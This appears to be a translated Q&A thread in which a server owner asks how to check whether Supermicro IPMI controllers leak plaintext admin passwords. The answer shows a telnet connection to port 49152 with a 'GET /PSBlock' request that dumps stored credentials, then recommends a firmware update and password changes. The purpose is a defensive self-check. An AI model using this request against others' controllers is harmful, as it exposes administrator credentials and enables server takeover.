Как проверить, не скомпрометирован ли мой Supermicro IPMI с незашифрованным паролем администратора через Интернет?

10

У меня есть несколько серверов Supermicro с запущенным IPMI, и, как описано в этом блоге ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ), существует критическая уязвимость получить незашифрованные пароли администратора из любого удаленного места.

Как проверить, не скомпрометирована ли материнская плата сервера?

Винициус Ферран
источник

Ответы:

13

Просто подключитесь к IP-адресу IPMI через порт 49152 и выполните определенный запрос GET. Вы должны получить ваши пользователи и пароли, если вы скомпрометированы.

telnet server.example.com 49152

После подключения попросите GET /PSBlockи посмотрите результаты, должно быть что-то вроде этого:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

Ответ:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

Чтобы решить эту проблему, обновите прошивку IPMI до последней версии. Прошивка зависит от вашего контроллера IPMI, поэтому вы должны получить указанный на веб-сайте Supermicro.

Затем после обновления прошивки смените пароли .

Винициус Ферран
источник